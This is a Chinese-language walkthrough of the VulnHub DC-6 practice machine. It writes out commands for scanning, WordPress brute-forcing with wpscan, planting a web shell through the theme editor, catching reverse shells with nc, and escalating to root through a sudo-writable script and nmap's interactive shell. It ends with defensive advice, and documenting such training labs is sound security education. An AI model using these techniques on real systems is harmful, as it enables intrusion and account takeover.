vulnhub系列12—DC 6
字数 1536 2025-08-12 11:34:24
DC-6 靶场实战教学文档
1. 靶场概述
DC-6 是 Vulnhub 上的一个 WordPress 靶机,难度中等,主要考察以下技能:
- 信息收集与枚举
- WordPress 漏洞利用
- 密码爆破技术
- 权限提升技术
2. 环境准备
- 下载靶机:从 Vulnhub 下载 DC-6 虚拟机
- 网络配置:确保攻击机与靶机在同一网络段(如 192.168.56.0/24)
- 工具准备:nmap、wpscan、netdiscover、Burp Suite 等
3. 渗透测试过程
3.1 信息收集
3.1.1 网络发现
netdiscover -r 192.168.56.0/24
3.1.2 端口扫描与服务识别
nmap -sV -Pn -sC -A 192.168.56.144
关键发现:
- 发现 WordPress 网站
- 发现域名 wordy(需添加到 hosts 文件)
3.1.3 域名配置
编辑 /etc/hosts 文件:
vim /etc/hosts
添加:
192.168.56.144 wordy
3.2 WordPress 枚举
3.2.1 用户枚举
wpscan --url http://wordy/ --enumerate u
关键提示:作者提示密码爆破需要使用 rockyou.txt 中 "k01" 字段相关的密码
3.2.2 密码爆破
- 创建用户名字典(基于 wpscan 枚举结果)
- 创建密码字典(基于 rockyou.txt 中 "k01" 相关字段)
- 执行爆破:
wpscan --url http://wordy/ -U uname.txt -P passwords.txt
获取凭证:
- 用户名:mark
- 密码:helpdesk01
3.3 获取初始访问
3.3.1 WordPress 后台登录
- 访问 http://wordy/wp-admin
- 使用 mark/helpdesk01 登录
3.3.2 获取 Web Shell
- 通过 WordPress 后台编辑主题文件插入恶意代码
- 使用 Burp Suite 绕过长度限制(直接前端修改可能无效)
3.3.3 反弹 Shell
- Kali 设置监听:
nc -lvnp 4444
- 通过 Web Shell 执行反弹命令
3.3.4 稳定 Shell
python -c "import pty;pty.spawn('/bin/bash');"
3.4 权限提升
3.4.1 用户枚举
cat /etc/passwd
发现多个用户:mark, graham, jens 等
3.4.2 发现新凭证
检查 mark 用户目录:
cd /home/mark
cat stuff/things-to-do.txt
发现 graham 用户的凭证:
- 用户名:graham
- 密码:GSo7isUM1D4
3.4.3 SSH 登录
ssh graham@localhost
3.4.4 检查 sudo 权限
sudo -l
发现可以以 jens 用户身份无需密码执行 /home/jens/backups.sh
3.4.5 横向提权到 jens
- 编辑 backups.sh 文件:
vi /home/jens/backups.sh
添加反弹 shell 代码
- 执行脚本:
sudo -u jens ./backups.sh
- Kali 监听新端口:
nc -lvvp 7777
3.4.6 提权到 root
- 检查 jens 的 sudo 权限:
sudo -l
发现可以以 root 身份运行 nmap
- 利用 nmap 提权:
sudo nmap --interactive
nmap> !sh
4. 关键知识点总结
-
密码爆破技巧:
- 利用作者提示创建针对性字典
- 结合 wpscan 进行 WordPress 凭证爆破
-
WordPress 利用:
- 通过主题编辑获取 Web Shell
- 使用 Burp Suite 绕过前端限制
-
权限提升路径:
mark → graham → jens → root- 通过文件发现新凭证
- 利用 sudo 权限横向移动
- 最终通过 nmap 的交互模式获取 root
-
稳定 Shell 技巧:
- 使用 Python 生成伪终端
- 多级反弹 Shell 确保连接稳定
5. 防御建议
-
WordPress 安全:
- 限制主题/插件编辑权限
- 使用强密码策略
- 定期更新 WordPress 核心和插件
-
系统安全:
- 定期检查 sudo 权限配置
- 避免在脚本中存储敏感信息
- 限制 nmap 等工具的 SUID 权限
-
日志监控:
- 监控 WordPress 后台登录尝试
- 记录 sudo 命令执行情况
- 监控异常进程创建
通过本靶场,可以全面练习从信息收集到权限提升的完整渗透测试流程,特别是 WordPress 和 Linux 系统的安全防护要点。